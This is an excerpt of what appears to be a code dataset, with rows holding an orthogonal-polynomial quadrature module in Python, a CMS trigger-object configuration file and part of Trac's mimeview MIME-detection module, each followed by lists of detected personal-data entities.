Setting NOPT=2 returns the + L2-normalized polynomials + """""" + + m = len(x) + P = np.zeros((m, N + 1)) + + apb = a + b + a1 = a - 1 + b1 = b - 1 + c = apb * (a - b) + + P[:, 0] = 1 + + if N > 0: + P[:, 1] = 0.5 * (a - b + (apb + 2) * x) + + if N > 1: + for k in range(2, N + 1): + k2 = 2 * k + g = k2 + apb + g1 = g - 1 + g2 = g - 2 + d = 2.0 * (k + a1) * (k + b1) * g + P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] - + d * P[:, k - 2]) / (k2 * (k + apb) * g2) + + if NOPT == 2: + k = np.arange(N + 1) + pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \ + ((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1))) + P *= 1 / np.sqrt(pnorm) + return P + + +def jacobiD(N, a, b, x, NOPT=1): + """""" + JACOBID computes the first derivatives of the normalized Jacobi + polynomials which are orthogonal on [-1,1] with respect + to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluates them + on the given grid up to P_N(x). Setting NOPT=2 returns + the derivatives of the L2-normalized polynomials + """""" + + z = np.zeros((len(x), 1)) + if N == 0: + Px = z + else: + + Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) * + ((a + b + 2 + np.arange(N))))) + return Px + + +def mm_log(N, a): + """""" + MM_LOG Modified moments for a logarithmic weight function. + + The call mm=MM_LOG(n,a) computes the first n modified moments of the + logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to + shifted Legendre polynomials. + + REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre + polynomial integral' by James L. Blue'', + Math. Comp. 33 (1979), 742-743. + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m + """""" + + if a <= -1: + raise ValueError('Parameter a must be greater than -1') + + prod = lambda z: reduce(lambda x, y: x * y, z, 1) + + mm = np.zeros(N) + + c = 1 + for n in range(N): + if isinstance(a, int) and a < n: + + p = range(n - a, n + a + 2) + mm[n] = (-1) ** (n - a) / prod(p) + mm[n] *= gamma(a + 1) ** 2 + + else: + if n == 0: + mm[0] = 1 / (a + 1) ** 2 + else: + k = np.arange(1, n + 1) + s = 1 / (a + 1 + k) - 1 / (a + 1 - k) + p = (a + 1 - k) / (a + 1 + k) + mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1) + + mm[n] *= c + c *= 0.5 * (n + 1) / (2 * n + 1) + + return mm + + +def mod_chebyshev(N, mom, alpham, betam): + """""" + Calculate the recursion coefficients for the orthogonal polynomials + which are orthogonal with respect to a weight function which is + represented in terms of its modified moments which are obtained by + integrating the monic polynomials against the weight function. + + References + ---------- + + John C. Wheeler, ""Modified moments and Gaussian quadratures"" + Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296 + + Walter Gautschi, ""Orthogonal Polynomials (in Matlab)"" + Journal of Computational and Applied Mathematics, Vol.
178 (2005) 215--234 + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m + + """""" + + if not isinstance(N, int): + raise TypeError('N must be an integer') + + if N < 1: + raise ValueError('N must be at least 1') + + N = min(N, int(len(mom) / 2)) + + alpha = np.zeros(N) + beta = np.zeros(N) + normsq = np.zeros(N) + sig = np.zeros((N + 1, 2 * N)) + + alpha[0] = alpham[0] + mom[1] / mom[0] + beta[0] = mom[0] + + sig[1, :] = mom + + for n in range(2, N + 1): + for m in range(n - 1, 2 * N - n + 1): + sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \ + beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1] + + alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \ + sig[n - 1, n - 2] + beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2] + + normsq = np.diagonal(sig, -1) + + return alpha, beta, normsq + + +def rec_jaclog(N, a): + """""" + Generate the recursion coefficients alpha_k, beta_k + + P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x) + + for the monic polynomials which are orthogonal on [0,1] + with respect to the weight w(x)=x^a*log(1/x) + + Inputs: + N - polynomial order + a - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adapted from the MATLAB code: + https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m + """""" + alphaj, betaj = rec_jacobi01(2 * N, 0, 0) + mom = mm_log(2 * N, a) + alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj) + return alpha, beta +",10886,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Greg von Winckel'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['DATE_TIME', 'Wed Jan 1'], ['DATE_TIME', '2014'], ['PERSON', 'David A. Ham'], ['DATE_TIME', '2016'], ['PERSON', 'Walter Gautschi\n '], ['PERSON', 'Gene Golub'], ['DATE_TIME', 'April 1973'], ['LOCATION', 'P_{k+1}(x'], ['PERSON', 'Dirk Laurie'], ['PERSON', 'Walter Gautschi\n '], ['LOCATION', ""ValueError('N""], ['PERSON', 'NOPT'], ['PERSON', 'Px'], ['PERSON', 'Px'], ['PERSON', 'NOPT'], ['PERSON', 'Walter Gautschi,``On'], ['PERSON', ""James L. Blue''""], ['DATE_TIME', '33 (1979'], ['LOCATION', 'mm[0'], ['LOCATION', 'alpham'], ['PERSON', 'betam'], ['PERSON', 'John C. Wheeler'], ['NRP', 'Gaussian'], ['DATE_TIME', '1974'], ['PERSON', 'Walter Gautschi'], ['DATE_TIME', '2005'], ['LOCATION', ""ValueError('N""], ['DATE_TIME', 'min(N'], ['LOCATION', 'rec_jaclog(N'], ['LOCATION', 'P_{k+1}(x'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m'], ['URL', 'orthopoly.py'], ['URL', 'email.com'], ['URL', 'numpy.li'], ['URL', 'np.re'], ['URL', 'numpy.li'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar']]" +6,"## @package TriggerObjectBlock_cfi +# Configuration file that defines the producer of ROOT-tuple for trigger objects.
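[Editor's note] A minimal usage sketch for the orthopoly module that ends just above (an editorial addition; it assumes the module is importable as orthopoly). With a = b = 0, rec_jacobi yields the Legendre recursion coefficients, so gauss returns a Gauss-Legendre rule on [-1, 1]:

import numpy as np
from orthopoly import gauss, rec_jacobi

alpha, beta = rec_jacobi(5, 0, 0)  # coefficients for a 5-point rule
x, w = gauss(alpha, beta)

# The weights integrate 1 exactly over [-1, 1] (they sum to beta[0] = 2),
# and an n-point Gauss rule is exact up to polynomial degree 2n - 1.
assert np.isclose(w.sum(), 2.0)
assert np.isclose(np.dot(w, x ** 4), 2.0 / 5.0)  # integral of x^4 on [-1, 1]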
+# +# \author Subir Sarkar +# \author Rosamaria Venditti (INFN Bari, Bari University) +# \author Konstantin Androsov (University of Siena, INFN Pisa) +# \author Maria Teresa Grippo (University of Siena, INFN Pisa) +# +# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University) +# Copyright 2014 Konstantin Androsov dummy@email.com, +# Maria Teresa Grippo dummy@email.com +# +# This file is part of X->HH->bbTauTau. +# +# X->HH->bbTauTau is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# (at your option) any later version. +# +# X->HH->bbTauTau is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with X->HH->bbTauTau. If not, see . + +import FWCore.ParameterSet.Config as cms + +triggerObjectBlock = cms.EDAnalyzer(""TriggerObjectBlock"", + verbosity = cms.int32(0), + hltInputTag = cms.InputTag('TriggerResults','','HLT'), + triggerEventTag = cms.InputTag('patTriggerEvent'), + hltPathsOfInterest = cms.vstring (""HLT_DoubleMu"", + ""HLT_Mu"", + ""HLT_IsoMu"", + ""HLT_TripleMu"", + ""IsoPFTau"", + ""TrkIsoT"", + ""HLT_Ele""), + May10ReRecoData = cms.bool(False) +) +",1844,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['DATE_TIME', '2011-2013'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['DATE_TIME', '2014'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['PERSON', 'triggerEventTag = cms'], ['PERSON', ""InputTag('patTriggerEvent""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'FWCore.ParameterSet.Co'], ['URL', 'cms.int'], ['URL', 'cms.In'], ['URL', 'cms.In'], ['URL', 'cms.bo']]" +7,"# -*- coding: utf-8 -*- +# +# Copyright (C) 2004-2010 Edgewall Software +# Copyright (C) 2004 Daniel Lundin dummy@email.com +# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com +# Copyright (C) 2006-2007 Christian Boos dummy@email.com +# All rights reserved. +# +# This software is licensed as described in the file COPYING, which +# you should have received as part of this distribution. The terms +# are also available at http://trac.edgewall.org/wiki/TracLicense. +# +# This software consists of voluntary contributions made by many +# individuals. For the exact contribution history, see the revision +# history and logs, available at http://trac.edgewall.org/log/. +# +# Author: Daniel Lundin dummy@email.com +# Christopher Lenz dummy@email.com +# Christian Boos dummy@email.com + +"""""" +File metadata management +------------------------ + +The `trac.mimeview` package centralizes the intelligence related to +file metadata, principally concerning the `type` (MIME type) of the +content and, if relevant, concerning the text encoding (charset) used +by the content. + +There are primarily two approaches for getting the MIME type of a +given file, either taking advantage of existing conventions for the +file name, or examining the file content and applying various +heuristics. 
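+(Editor's illustrative aside, not part of the original docstring.) The two
+strategies can be sketched with the standard library alone; the following
+is an independent toy, not trac's implementation::
+
+    import mimetypes
+    import re
+
+    def naive_guess(filename, content=None):
+        # 1) filename convention: extension lookup
+        guessed, _ = mimetypes.guess_type(filename)
+        if guessed:
+            return guessed
+        # 2) content heuristic: sniff a shebang line
+        if content:
+            m = re.search(r'#!.*?(\w+)\s*$', content[:200], re.M)
+            if m:
+                return 'text/x-%s' % m.group(1)
+        return 'application/octet-stream'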
+ +The module also knows how to convert the file content from one type to +another type. + +In some cases, only the `url` pointing to the file's content is +actually needed, that's why we avoid to read the file's content when +it's not needed. + +The actual `content` to be converted might be a `unicode` object, but +it can also be the raw byte string (`str`) object, or simply an object +that can be `read()`. + +.. note:: (for plugin developers) + + The Mimeview API is quite complex and many things there are + currently a bit difficult to work with (e.g. what an actual + `content` might be, see the last paragraph of this description). + + So this area is mainly in a ''work in progress'' state, which will + be improved along the lines described in :teo:`#3332`. + + In particular, if you are interested in writing `IContentConverter` + and `IHTMLPreviewRenderer` components, note that those interfaces + will be merged into a new style `IContentConverter`. Feel free to + contribute remarks and suggestions for improvements to the + corresponding ticket (#3332 as well). +"""""" + +import re +from StringIO import StringIO + +from genshi import Markup, Stream +from genshi.core import TEXT, START, END, START_NS, END_NS +from genshi.builder import Fragment, tag +from genshi.input import HTMLParser + +from trac.config import IntOption, ListOption, Option +from trac.core import * +from trac.resource import Resource +from trac.util import Ranges, content_disposition +from trac.util.text import exception_to_unicode, to_utf8, to_unicode +from trac.util.translation import _, tag_ + + +__all__ = ['Context', 'Mimeview', 'RenderingContext', 'get_mimetype', + 'is_binary', 'detect_unicode', 'content_to_unicode', 'ct_mimetype'] + +class RenderingContext(object): + """""" + A rendering context specifies ''how'' the content should be rendered. + + It holds together all the needed contextual information that will be + needed by individual renderer components. + + To that end, a context keeps track of the Href instance (`.href`) which + should be used as a base for building URLs. + + It also provides a `PermissionCache` (`.perm`) which can be used to + restrict the output so that only the authorized information is shown. + + A rendering context may also be associated to some Trac resource which + will be used as the implicit reference when rendering relative links + or for retrieving relative content and can be used to retrieve related + metadata. + + Rendering contexts can be nested, and a new context can be created from + an existing context using the call syntax. The previous context can be + retrieved using the `.parent` attribute. + + For example, when rendering a wiki text of a wiki page, the context will + be associated to a resource identifying that wiki page. + + If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will + set up nested contexts for each matching ticket that will be used for + rendering the ticket descriptions. + + :since: version 0.11 + """""" + + def __init__(self, resource, href=None, perm=None): + """"""Directly create a `RenderingContext`. + + :param resource: the associated resource + :type resource: `Resource` + :param href: an `Href` object suitable for creating URLs + :param perm: a `PermissionCache` object used for restricting the + generated output to ""authorized"" information only. + + The actual `.perm` attribute of the rendering context will be bound + to the given `resource` so that fine-grained permission checks will + apply to that. 
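+        (Editor's illustrative example, not in the original docstring: a
+        typical construction is ``RenderingContext(Resource('wiki',
+        'WikiStart'), href=req.href, perm=req.perm)``; the resulting
+        `.perm` is then pre-bound to the WikiStart resource.)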
+ """""" + self.parent = None #: The parent context, if any + self.resource = resource + self.href = href + self.perm = perm(resource) if perm and resource else perm + self._hints = None + + @staticmethod + def from_request(*args, **kwargs): + """""":deprecated: since 1.0, use `web_context` instead."""""" + from trac.web.chrome import web_context + return web_context(*args, **kwargs) + + def __repr__(self): + path = [] + context = self + while context: + if context.resource.realm: # skip toplevel resource + path.append(repr(context.resource)) + context = context.parent + return '<%s %s>' % (type(self).__name__, ' - '.join(reversed(path))) + + def child(self, resource=None, id=False, version=False, parent=False): + """"""Create a nested rendering context. + + `self` will be the parent for the new nested context. + + :param resource: either a `Resource` object or the realm string for a + resource specification to be associated to the new + context. If `None`, the resource will be the same + as the resource of the parent context. + :param id: the identifier part of the resource specification + :param version: the version of the resource specification + :return: the new context object + :rtype: `RenderingContext` + + >>> context = RenderingContext('wiki', 'WikiStart') + >>> ticket1 = Resource('ticket', 1) + >>> context.child('ticket', 1).resource == ticket1 + True + >>> context.child(ticket1).resource is ticket1 + True + >>> context.child(ticket1)().resource is ticket1 + True + """""" + if resource: + resource = Resource(resource, id=id, version=version, + parent=parent) + else: + resource = self.resource + context = RenderingContext(resource, href=self.href, perm=self.perm) + context.parent = self + + # hack for context instances created by from_request() + # this is needed because various parts of the code rely on a request + # object being available, but that will hopefully improve in the + # future + if hasattr(self, 'req'): + context.req = self.req + + return context + + __call__ = child + + def __contains__(self, resource): + """"""Check whether a resource is in the rendering path. + + The primary use for this check is to avoid to render the content of a + resource if we're already embedded in a context associated to that + resource. + + :param resource: a `Resource` specification which will be checked for + """""" + context = self + while context: + if context.resource and \ + context.resource.realm == resource.realm and \ + context.resource.id == resource.id: + # we don't care about version here + return True + context = context.parent + + # Rendering hints + # + # A rendering hint is a key/value pairs that can influence renderers, + # wiki formatters and processors in the way they produce their output. + # The keys are strings, but the values could be anything. + # + # In nested contexts, the hints are inherited from their parent context, + # unless overriden locally. + + def set_hints(self, **keyvalues): + """"""Set rendering hints for this rendering context. 
+ + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner', shorten_lines=True) + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.set_hints(wiki_flavor='html', preserve_newlines=True) + >>> (t_ctx.get_hint('wiki_flavor'), t_ctx.get_hint('shorten_lines'), \ + t_ctx.get_hint('preserve_newlines')) + ('html', True, True) + >>> (ctx.get_hint('wiki_flavor'), ctx.get_hint('shorten_lines'), \ + ctx.get_hint('preserve_newlines')) + ('oneliner', True, None) + """""" + if self._hints is None: + self._hints = {} + hints = self._parent_hints() + if hints is not None: + self._hints.update(hints) + self._hints.update(keyvalues) + + def get_hint(self, hint, default=None): + """"""Retrieve a rendering hint from this context or an ancestor context. + + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner') + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.get_hint('wiki_flavor') + 'oneliner' + >>> t_ctx.get_hint('preserve_newlines', True) + True + """""" + hints = self._hints + if hints is None: + hints = self._parent_hints() + if hints is None: + return default + return hints.get(hint, default) + + def has_hint(self, hint): + """"""Test whether a rendering hint is defined in this context or in some + ancestor context. + + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner') + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.has_hint('wiki_flavor') + True + >>> t_ctx.has_hint('preserve_newlines') + False + """""" + hints = self._hints + if hints is None: + hints = self._parent_hints() + if hints is None: + return False + return hint in hints + + def _parent_hints(self): + p = self.parent + while p and p._hints is None: + p = p.parent + return p and p._hints + + +class Context(RenderingContext): + """""":deprecated: old name kept for compatibility, use `RenderingContext`."""""" + + +# Some common MIME types and their associated keywords and/or file extensions + +KNOWN_MIME_TYPES = { + 'application/javascript': 'js', + 'application/msword': 'doc dot', + 'application/pdf': 'pdf', + 'application/postscript': 'ps', + 'application/rtf': 'rtf', + 'application/x-sh': 'sh', + 'application/x-csh': 'csh', + 'application/x-troff': 'nroff roff troff', + 'application/x-yaml': 'yml yaml', + + 'application/rss+xml': 'rss', + 'application/xsl+xml': 'xsl', + 'application/xslt+xml': 'xslt', + + 'image/x-icon': 'ico', + 'image/svg+xml': 'svg', + + 'model/vrml': 'vrml wrl', + + 'text/css': 'css', + 'text/html': 'html htm', + 'text/plain': 'txt TXT text README INSTALL ' + 'AUTHORS COPYING ChangeLog RELEASE', + 'text/xml': 'xml', + + # see also TEXT_X_TYPES below + 'text/x-csrc': 'c xs', + 'text/x-chdr': 'h', + 'text/x-c++src': 'cc CC cpp C c++ C++', + 'text/x-c++hdr': 'hh HH hpp H', + 'text/x-csharp': 'cs c# C#', + 'text/x-diff': 'patch', + 'text/x-eiffel': 'e', + 'text/x-elisp': 'el', + 'text/x-fortran': 'f', + 'text/x-haskell': 'hs', + 'text/x-ini': 'ini cfg', + 'text/x-objc': 'm mm', + 'text/x-ocaml': 'ml mli', + 'text/x-makefile': 'make mk Makefile GNUMakefile', + 'text/x-pascal': 'pas', + 'text/x-perl': 'pl pm PL', + 'text/x-php': 'php3 php4', + 'text/x-python': 'py', + 'text/x-pyrex': 'pyx', + 'text/x-ruby': 'rb', + 'text/x-scheme': 'scm', + 'text/x-textile': 'txtl', + 'text/x-vba': 'vb vba bas', + 'text/x-verilog': 'v', + 'text/x-vhdl': 'vhd', +} +for t in KNOWN_MIME_TYPES.keys(): + types = KNOWN_MIME_TYPES[t].split() + if t.startswith('text/x-'): + types.append(t[len('text/x-'):]) + KNOWN_MIME_TYPES[t] = types + +# extend the above with simple (text/x-: ) 
mappings + +TEXT_X_TYPES = """""" + ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh +"""""" +for x in TEXT_X_TYPES.split(): + KNOWN_MIME_TYPES.setdefault('text/x-%s' % x, []).append(x) + + +# Default mapping from keywords/extensions to known MIME types: + +MIME_MAP = {} +for t, exts in KNOWN_MIME_TYPES.items(): + MIME_MAP[t] = t + for e in exts: + MIME_MAP[e] = t + +# Simple builtin autodetection from the content using a regexp +MODE_RE = re.compile(r"""""" + \#!.+?env\s+(\w+) # 1. look for shebang with env + | \#!(?:[/\w.-_]+/)?(\w+) # 2. look for regular shebang + | -\*-\s*(?:mode:\s*)?([\w+-]+)\s*-\*- # 3. look for Emacs' -*- mode -*- + | vim:.*?(?:syntax|filetype|ft)=(\w+) # 4. look for VIM's syntax= + """""", re.VERBOSE) + +def get_mimetype(filename, content=None, mime_map=MIME_MAP): + """"""Guess the most probable MIME type of a file with the given name. + + `filename` is either a filename (the lookup will then use the suffix) + or some arbitrary keyword. + + `content` is either a `str` or an `unicode` string. + """""" + suffix = filename.split('.')[-1] + if suffix in mime_map: + # 1) mimetype from the suffix, using the `mime_map` + return mime_map[suffix] + else: + mimetype = None + try: + import mimetypes + # 2) mimetype from the suffix, using the `mimetypes` module + mimetype = mimetypes.guess_type(filename)[0] + except Exception: + pass + if not mimetype and content: + match = re.search(MODE_RE, content[:1000] + content[-1000:]) + if match: + mode = match.group(1) or match.group(2) or match.group(4) or \ + match.group(3).lower() + if mode in mime_map: + # 3) mimetype from the content, using the `MODE_RE` + return mime_map[mode] + else: + if is_binary(content): + # 4) mimetype from the content, using`is_binary` + return 'application/octet-stream' + return mimetype + +def ct_mimetype(content_type): + """"""Return the mimetype part of a content type."""""" + return (content_type or '').split(';')[0].strip() + +def is_binary(data): + """"""Detect binary content by checking the first thousand bytes for zeroes. + + Operate on either `str` or `unicode` strings. + """""" + if isinstance(data, str) and detect_unicode(data): + return False + return '\0' in data[:1000] + +def detect_unicode(data): + """"""Detect different unicode charsets by looking for BOMs (Byte Order Mark). + + Operate obviously only on `str` objects. + """""" + if data.startswith('\xff\xfe'): + return 'utf-16-le' + elif data.startswith('\xfe\xff'): + return 'utf-16-be' + elif data.startswith('\xef\xbb\xbf'): + return 'utf-8' + else: + return None + +def content_to_unicode(env, content, mimetype): + """"""Retrieve an `unicode` object from a `content` to be previewed. + + In case the raw content had an unicode BOM, we remove it. + + >>> from trac.test import EnvironmentStub + >>> env = EnvironmentStub() + >>> content_to_unicode(env, u""\ufeffNo BOM! h\u00e9 !"", '') + u'No BOM! h\\xe9 !' + >>> content_to_unicode(env, ""\xef\xbb\xbfNo BOM! h\xc3\xa9 !"", '') + u'No BOM! h\\xe9 !' + + """""" + mimeview = Mimeview(env) + if hasattr(content, 'read'): + content = content.read(mimeview.max_preview_size) + u = mimeview.to_unicode(content, mimetype) + if u and u[0] == u'\ufeff': + u = u[1:] + return u + + +class IHTMLPreviewRenderer(Interface): + """"""Extension point interface for components that add HTML renderers of + specific content types to the `Mimeview` component. + + .. 
note:: + + This interface will be merged with IContentConverter, as + conversion to text/html will simply be a particular content + conversion. + + Note however that the IHTMLPreviewRenderer will still be + supported for a while through an adapter, whereas the + IContentConverter interface itself will be changed. + + So if all you want to do is convert to HTML and don't feel like + following the API changes, you should rather implement this + interface for the time being. + """""" + + #: implementing classes should set this property to True if they + #: support text content where Trac should expand tabs into spaces + expand_tabs = False + + #: indicate whether the output of this renderer is source code that can + #: be decorated with annotations + returns_source = False + + def get_quality_ratio(mimetype): + """"""Return the level of support this renderer provides for the `content` + of the specified MIME type. The return value must be a number between + 0 and 9, where 0 means no support and 9 means ""perfect"" support. + """""" + + def render(context, mimetype, content, filename=None, url=None): + """"""Render an XHTML preview of the raw `content` in a RenderingContext. + + The `content` might be: + * a `str` object + * an `unicode` string + * any object with a `read` method, returning one of the above + + It is assumed that the content will correspond to the given `mimetype`. + + Besides the `content` value, the same content may eventually + be available through the `filename` or `url` parameters. + This is useful for renderers that embed objects, using or + instead of including the content inline. + + Can return the generated XHTML text as a single string or as an + iterable that yields strings. In the latter case, the list will + be considered to correspond to lines of text in the original content. + """""" + + +class IHTMLPreviewAnnotator(Interface): + """"""Extension point interface for components that can annotate an XHTML + representation of file contents with additional information."""""" + + def get_annotation_type(): + """"""Return a (type, label, description) tuple + that defines the type of annotation and provides human readable names. + The `type` element should be unique to the annotator. + The `label` element is used as column heading for the table, + while `description` is used as a display name to let the user + toggle the appearance of the annotation type. + """""" + + def get_annotation_data(context): + """"""Return some metadata to be used by the `annotate_row` method below. + + This will be called only once, before lines are processed. + If this raises an error, that annotator won't be used. + """""" + + def annotate_row(context, row, number, line, data): + """"""Return the XHTML markup for the table cell that contains the + annotation data. + + `context` is the context corresponding to the content being annotated, + `row` is the tr Element being built, `number` is the line number being + processed and `line` is the line's actual content. + `data` is whatever additional data the `get_annotation_data` method + decided to provide. + """""" + + +class IContentConverter(Interface): + """"""An extension point interface for generic MIME based content + conversion. + + .. 
note:: This api will likely change in the future (see :teo:`#3332`) + + """""" + + def get_supported_conversions(): + """"""Return an iterable of tuples in the form (key, name, extension, + in_mimetype, out_mimetype, quality) representing the MIME conversions + supported and + the quality ratio of the conversion in the range 0 to 9, where 0 means + no support and 9 means ""perfect"" support. eg. ('latex', 'LaTeX', 'tex', + 'text/x-trac-wiki', 'text/plain', 8)"""""" + + def convert_content(req, mimetype, content, key): + """"""Convert the given content from mimetype to the output MIME type + represented by key. Returns a tuple in the form (content, + output_mime_type) or None if conversion is not possible."""""" + + +class Content(object): + """"""A lazy file-like object that only reads `input` if necessary."""""" + def __init__(self, input, max_size): + self.input = input + self.max_size = max_size + self.content = None + + def read(self, size=-1): + if size == 0: + return '' + if self.content is None: + self.content = StringIO(self.input.read(self.max_size)) + return self.content.read(size) + + def reset(self): + if self.content is not None: + self.content.seek(0) + + +class Mimeview(Component): + """"""Generic HTML renderer for data, typically source code."""""" + + required = True + + renderers = ExtensionPoint(IHTMLPreviewRenderer) + annotators = ExtensionPoint(IHTMLPreviewAnnotator) + converters = ExtensionPoint(IContentConverter) + + default_charset = Option('trac', 'default_charset', 'utf-8', + """"""Charset to be used when in doubt."""""") + + tab_width = IntOption('mimeviewer', 'tab_width', 8, + """"""Displayed tab width in file preview. (''since 0.9'')"""""") + + max_preview_size = IntOption('mimeviewer', 'max_preview_size', 262144, + """"""Maximum file size for HTML preview. (''since 0.9'')"""""") + + mime_map = ListOption('mimeviewer', 'mime_map', + 'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb', + doc=""""""List of additional MIME types and keyword mappings. + Mappings are comma-separated, and for each MIME type, + there's a colon ("":"") separated list of associated keywords + or file extensions. (''since 0.10'')"""""") + + treat_as_binary = ListOption('mimeviewer', 'treat_as_binary', + 'application/octet-stream, application/pdf, application/postscript, ' + 'application/msword,application/rtf,', + doc=""""""Comma-separated list of MIME types that should be treated as + binary data. (''since 0.11.5'')"""""") + + def __init__(self): + self._mime_map = None + + # Public API + + def get_supported_conversions(self, mimetype): + """"""Return a list of target MIME types in same form as + `IContentConverter.get_supported_conversions()`, but with the converter + component appended. Output is ordered from best to worst quality."""""" + converters = [] + for converter in self.converters: + conversions = converter.get_supported_conversions() or [] + for k, n, e, im, om, q in conversions: + if im == mimetype and q > 0: + converters.append((k, n, e, im, om, q, converter)) + converters = sorted(converters, key=lambda i: i[-2], reverse=True) + return converters + + def convert_content(self, req, mimetype, content, key, filename=None, + url=None): + """"""Convert the given content to the target MIME type represented by + `key`, which can be either a MIME type or a key. 
Returns a tuple of + (content, output_mime_type, extension)."""""" + if not content: + return ('', 'text/plain;charset=utf-8', '.txt') + + # Ensure we have a MIME type for this content + full_mimetype = mimetype + if not full_mimetype: + if hasattr(content, 'read'): + content = content.read(self.max_preview_size) + full_mimetype = self.get_mimetype(filename, content) + if full_mimetype: + mimetype = ct_mimetype(full_mimetype) # split off charset + else: + mimetype = full_mimetype = 'text/plain' # fallback if not binary + + # Choose best converter + candidates = list(self.get_supported_conversions(mimetype) or []) + candidates = [c for c in candidates if key in (c[0], c[4])] + if not candidates: + raise TracError( + _(""No available MIME conversions from %(old)s to %(new)s"", + old=mimetype, new=key)) + + # First successful conversion wins + for ck, name, ext, input_mimettype, output_mimetype, quality, \ + converter in candidates: + output = converter.convert_content(req, mimetype, content, ck) + if output: + return (output[0], output[1], ext) + raise TracError( + _(""No available MIME conversions from %(old)s to %(new)s"", + old=mimetype, new=key)) + + def get_annotation_types(self): + """"""Generator that returns all available annotation types."""""" + for annotator in self.annotators: + yield annotator.get_annotation_type() + + def render(self, context, mimetype, content, filename=None, url=None, + annotations=None, force_source=False): + """"""Render an XHTML preview of the given `content`. + + `content` is the same as an `IHTMLPreviewRenderer.render`'s + `content` argument. + + The specified `mimetype` will be used to select the most appropriate + `IHTMLPreviewRenderer` implementation available for this MIME type. + If not given, the MIME type will be infered from the filename or the + content. + + Return a string containing the XHTML text. + + When rendering with an `IHTMLPreviewRenderer` fails, a warning is added + to the request associated with the context (if any), unless the + `disable_warnings` hint is set to `True`. + """""" + if not content: + return '' + if not isinstance(context, RenderingContext): + raise TypeError(""RenderingContext expected (since 0.11)"") + + # Ensure we have a MIME type for this content + full_mimetype = mimetype + if not full_mimetype: + if hasattr(content, 'read'): + content = content.read(self.max_preview_size) + full_mimetype = self.get_mimetype(filename, content) + if full_mimetype: + mimetype = ct_mimetype(full_mimetype) # split off charset + else: + mimetype = full_mimetype = 'text/plain' # fallback if not binary + + # Determine candidate `IHTMLPreviewRenderer`s + candidates = [] + for renderer in self.renderers: + qr = renderer.get_quality_ratio(mimetype) + if qr > 0: + candidates.append((qr, renderer)) + candidates.sort(lambda x, y: cmp(y[0], x[0])) + + # Wrap file-like object so that it can be read multiple times + if hasattr(content, 'read'): + content = Content(content, self.max_preview_size) + + # First candidate which renders successfully wins. + # Also, we don't want to expand tabs more than once. 
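+        # (Editor's clarifying note, not in the original code: candidates
+        # are ordered from highest to lowest quality ratio, the first
+        # renderer that returns a result wins, and `expanded_content`
+        # caches the tab-expanded text so that a failing renderer does not
+        # force re-expansion for the next candidate.)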
